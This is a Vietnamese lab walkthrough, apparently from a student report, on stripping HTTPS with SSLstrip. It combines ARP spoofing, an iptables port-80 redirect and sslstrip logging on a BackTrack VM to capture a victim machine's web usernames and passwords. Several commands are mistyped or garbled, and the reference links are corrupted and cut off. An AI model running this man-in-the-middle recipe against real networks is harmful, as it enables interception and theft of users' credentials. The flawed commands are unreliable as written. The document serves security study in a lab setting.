SSLstrip là công cụ tương tác ở quá trình chuyển từ http sang https của các ứng dụng web. SSL strip là 1 công cụ hữu hiệu để capture được username/password login của các ứng dụng web.
SSL Trip được cài sẵn trong backtrack5.
2. Yêu cầu
1. Máy thật hoặc máy ảo Win XP hoặc Win 7 để làm nạn nhân 2. Máy ảo backtrack 5 RC2/3 (máy ảo), đã cài sẵn SSLstrip. Nếu
chưa cài được SSL strip :
Xem thư mục :
Cài đặt :
Lưu ý : phải cấu hình máy ảo dạng Bridged ( Network Adapter = Bridged ) để cùng mạng.
3. Tiến hành
Sử dụng máy windows XP làm máy victim (nạn nhân) có địa chỉ IP
192.168.137.168 default gateway 192.168.137.1, máy tấn công
backtrack có IP 192.168.137.130
Bước 1 : Trên attacker , ta bật enable chức năng IPv4 forward . Để tiến hành ARP poisoning :
Bước 2 : dùng IPtables để chuyển cất cả gói tin TCP ở port 80 sang port bất kì, ở đây ta chọn port 8 08 0. Port này là port listen của ssl strip sau này
Iptables –t nat –A FREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 8080
Bước 3 : chạy sslstrip listen ở port đã chọn ở trên (port 80 8 0) :
• Cd sslstrip-0.9
• Sslstrip –w logfilẹlog –l 8080
Bước 4 : Tiến hành arpspoof ( giả mạo địa chỉ MAC máy victim) :
• Với máy victim IP 192.168.137.168 và default gateway là 192.168.137.1 ta gõ lệnh
Arpspoof –i eth0 –t 192.168.137.168 192.168.137.1 Iptables –t nat –A PREROUTING –p tcp –destination –port 80 –j REDIRECT –-to-port <listenPort>
Bước 5 : Trên máy nạn nhân :
Arpspoof thành công địa chỉ MAC của default gateway và máy hacker có cùng MAC (118,200)
Bước 6 : Trên máy nạn nhân thực hiện các thao tác trên nền web (http port 80) và kiểm tra xem kết quả ở file filelog.log
Ta dùng lệnh : cat filelog.log để mở file và xem dữ liệu username và password của nạn nhân
Hoặc ta cũng có thể mở file trực tiếp : vào Places – Home Folder sau đó mở
Tài liệu tham khảọ1. http://doc.edụvn/tai-lieu/bao-cao-tim-hieu-giao-thuc-ssl-tls-cach-tan- 1. http://doc.edụvn/tai-lieu/bao-cao-tim-hieu-giao-thuc-ssl-tls-cach-tan- cong-va-phong-chong-7627/ 2. http://doc.edụvn/tai-lieu/do-an-nghien-cuu-ve-ssl-va-ung-dung-cua-ssl- trong-bao-mat-web-7783/ 3. http://www.slidesharẹnet/conglongit90/giao-thc-bo-mt-ssl 4. http://text.123doc.org/document/2236870-do-an-mon-ba-o-ma-t-thong-